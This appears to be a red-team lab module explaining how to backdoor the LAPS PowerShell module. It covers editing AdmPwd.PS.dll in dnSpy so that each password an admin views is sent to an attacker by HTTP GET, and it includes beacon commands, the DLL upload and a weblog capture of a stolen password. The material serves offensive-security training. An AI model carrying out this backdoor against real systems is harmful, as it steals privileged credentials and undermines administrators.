LAPS Backdoors
There are some techniques that we can leverage to backdoor the LAPS administrative tooling and obtain a copy of passwords when viewed by an admin. This module will demonstrate this idea using the LAPS PowerShell cmdlet Get-AdmPwdPassword. If installed on a machine, the LAPS PowerShell modules can be found under C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AdmPwd.PS.
beacon> ls
[*] Listing: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AdmPwd.PS\
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/16/2022 13:04:13 en-US
24kb fil 05/05/2021 12:04:14 AdmPwd.PS.dll
5kb fil 04/28/2021 18:56:38 AdmPwd.PS.format.ps1xml
4kb fil 04/28/2021 18:56:38 AdmPwd.PS.psd1
26kb fil 05/05/2021 12:04:14 AdmPwd.Utils.dll\
Since PowerShell heavily utilises the .NET Framework, the DLLs here are written in C# which makes them fairly trivial to download, modify and re-upload. Download AdmPwd.PS.dll and AdmPwd.Utils.dll, sync them to your attacking machine and open AdmPwd.PS.dll with dnSpy. Use the Assembly Explorer to drill down into the DLL, namespaces and classes until you find the GetPassword method.
\
\
This method calls DirectoryUtils.GetPasswordInfo which returns a PasswordInfo object. You can click on the name and dnSpy will take you to the class definition. It contains properties for ComputerName, DistinguishedName, Password and ExpirationTimestamp. The password is simply the plaintext password that is shown to the admin.
Let's modify the code to send the plaintext passwords to us over an HTTP GET request.
OPSEC This is obviously an irresponsible method to use in the real world, because the plaintext password is being sent unencrypted over the wire. This is just an example.
\
Go back to the GetPassword method, right-click somewhere in the main window and select Edit Method. The first thing we need to do is add a new assembly reference, using the little button at the bottom of the edit window.
\
\
Use the search box to find and add System.Net.
This code will simply instantiate a new WebClient and call the DownloadString method, passing the computer name and password in the URI.
\
\
Once the modifications are in place, click the Compile button in the bottom-right of the edit window. Then select File > Save Module to write the changes to disk. Upload the DLL back to the target to overwrite the existing file.
beacon> upload C:\Users\Attacker\Desktop\AdmPwd.PS.dll\
One downside to this tactic is that it will break the digital signature of the DLL, but it will not prevent PowerShell from using it.
beacon> powershell Get-AuthenticodeSignature *.dll
Directory: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AdmPwd.PS
SignerCertificate Status Path
----------------- ------ ----
NotSigned AdmPwd.PS.dll
ABDCA79AF9DD48A0EA702AD45260B3C03093FB4B Valid AdmPwd.Utils.dll \
As nlamb on Workstation 1, grab the LAPS password for a computer.
PS C:\Users\nlamb> Get-AdmPwdPassword -ComputerName sql-2 | fl
ComputerName : SQL-2
DistinguishedName : CN=SQL-2,OU=SQL Servers,OU=Servers,DC=dev,DC=cyberbotic,DC=io
Password : VloWch1sc5Hl40
ExpirationTimestamp : 9/17/2022 12:46:28 PM\
You should see a corresponding hit in your CS weblog.
09/14 11:49:32 visit (port 80) from: 10.10.122.254
Request: GET /
Response: 404 Not Found
null
= Form Data=
computer = SQL-2
pass = VloWch1sc5Hl40Last updated